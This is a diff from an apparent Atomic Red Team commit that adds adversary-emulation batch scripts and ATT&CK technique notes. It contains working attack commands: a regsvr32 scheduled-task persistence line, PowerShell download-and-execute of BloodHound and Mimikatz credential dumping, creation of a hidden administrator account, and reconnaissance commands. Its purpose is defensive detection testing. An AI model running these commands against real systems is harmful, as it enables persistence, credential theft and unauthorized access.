Merge pull request #18 from redcanaryco/dev-mh

Chain Reactions + Linux + Updates

ARTifacts/Chain_Reactions/chain_reaction_01.bat

@@ -0,0 +1,33 @@
+:: Chain Reaction 01
+::
+:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
+:: NOTE We recommend executing from a server that you control.
+:: NOTE Thank You :)
+:: This particular Chain Reaction focuses on generating event noise.
+
+:: Tactics: Persistence, Defense Evasion
+:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
+:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
+:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
+
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+
+:: Tactic: Discovery
+:: Execution: https://attack.mitre.org/wiki/Technique/T1086
+:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
+
+:: Tactic: Credential Access
+:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
+:: Add a user, then add to group
+
+Net user /add Trevor SmshBgr123
+
+:: Add user to group
+
+net localgroup administrators Trevor /add
+
+ECHO Well that was fun!
+
+pause

ARTifacts/Chain_Reactions/chain_reaction_02.bat

@@ -0,0 +1,56 @@
+:: Chain Reaction 02
+::
+:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
+:: NOTE We recommend executing from a server that you control.
+:: NOTE Thank You :)
+::
+:: This particular Chain Reaction focuses on enumeration.
+
+:: Tactic: Discovery
+:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
+:: Change IP scheme for your environment
+
+:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
+
+net.exe view
+
+net.exe view /domain
+
+:: Tactic: Discovery
+:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
+
+net localgroup "administrators"
+
+wmic useraccount get /ALL
+
+
+:: Tactic: Discovery
+:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
+
+netsh.exe advfirewall firewall show all profiles
+
+tasklist.exe | findstr cb
+
+tasklist.exe | findstr virus
+
+tasklist.exe | findstr defender
+
+:: Execution
+
+:: Tactic: Discovery
+:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
+
+ipconfig /all
+arp -a
+nbtstat -n
+
+:: Tactic: Discovery
+:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
+
+dir /s c:\ >> %temp%\download
+
+:: Tactic: Execution
+:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
+:: Download and invoke BloodHound Ingestor
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"

Linux/Discovery/Account_Discovery.md

@@ -0,0 +1,17 @@
+# Account Discovery
+
+MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
+
+List of all accounts:
+
+    cat /etc/passwd
+
+Currently logged in:
+
+Local:
+
+    finger
+
+Remote:
+
+    finger @<computer_name>

Linux/Persistence/Cron_Job.md

@@ -1,4 +1,4 @@
-# Bash History
+# Cron Job
 
 MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
 

Windows/Discovery/File_and_Directory_Discovery.md

@@ -6,7 +6,7 @@ MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
 
 Input:
 
-    dir c:\ >> %temp%\download
-    dir "c:\Documents and Settings" >> %temp%\download
-    dir "c:\Program Files\" >> %temp%\download
-    dir d:\ >> %temp%\download
+    dir /s c:\ >> %temp%\download
+    dir /s "c:\Documents and Settings" >> %temp%\download
+    dir /s "c:\Program Files\" >> %temp%\download
+    dir /s d:\ >> %temp%\download

Windows/Discovery/Security_Software_Discovery.md

@@ -4,12 +4,26 @@ MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1063)
 
 ### netsh
 
-    netsh.exe advfirewall firewall
+    netsh.exe advfirewall firewall show all profiles
 
 ### tasklist
 
+Input:
+
     tasklist.exe
 
+Input:
+
+    tasklist.exe | findstr virus
+
+Input:
+
+    tasklist.exe | findstr cb
+
+Input:
+
+    tasklist.exe | findstr defender
+
 
 ### PowerShell
 

Windows/Discovery/System_Network_Configuration_Discovery.md

@@ -0,0 +1,26 @@
+# System Network Configuration Discovery
+
+MITRE ATT&CK Technique: [T1016](https://attack.mitre.org/wiki/Technique/T1016)
+
+
+##
+
+Input:
+
+    ipconfig /all
+
+Input:
+
+    netsh interface show
+
+Input:
+
+    arp -a
+
+Input:
+
+    nbtstat -n
+
+Input:
+
+    net config

Windows/Execution/PowerShell.md

@@ -6,6 +6,10 @@ MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086)
 
     powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
 
+### Download and Execute BloodHound
+
+    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
+
 ### Download Mimikatz and Dump credentials
 
 Just download it: